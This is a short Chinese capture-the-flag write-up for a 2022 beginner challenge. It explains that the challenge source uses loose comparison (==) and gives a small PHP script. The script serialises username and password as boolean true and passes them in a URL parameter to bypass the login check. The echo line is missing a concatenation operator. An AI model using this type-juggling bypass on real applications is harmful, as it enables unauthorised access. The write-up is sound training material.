跳转至

[HUBUCTF 2022 新生赛]checkin

  1. 审计源码 发现使用 ==
  2. 写exp
<?php 
$data_unserialize = ["username"=>true,"password"=>true];
echo "?info="urlencode(serialize(($data_unserialize)));

传入即得

评论